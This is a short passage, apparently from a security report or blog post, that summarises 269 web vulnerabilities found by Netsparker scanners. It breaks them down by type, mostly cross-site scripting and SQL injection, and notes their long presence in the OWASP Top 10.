Top Most Vulnerabilities are:
Out of the 269 vulnerabilities the Netsparker web vulnerability scanners identified:
180 were Cross-site Scripting vulnerabilities. These include reflected, stored,DOM Based XSS and XSS via RFI.
55 were SQL Injection vulnerabilities. These also include the Boolean and Blind (Time Based) SQL Injections.
16 were File Inclusion vulnerabilities, including both remote and local file inclusions.
The rest of the vulnerability types are CSRF, Remote Command Execution, Command Injection, Open Redirection, HTTP Header Injection (web server software issue) and Frame injection.
Cross-site scripting and SQL Injection vulnerabilities have been included in the OWASP Top 10 since the project started, mainly because they are very easy to find and also very easy to exploit. And yet, even after years of raising awareness about these vulnerabilities, the majority of the web applications we use are vulnerable to these type of vulnerabilities.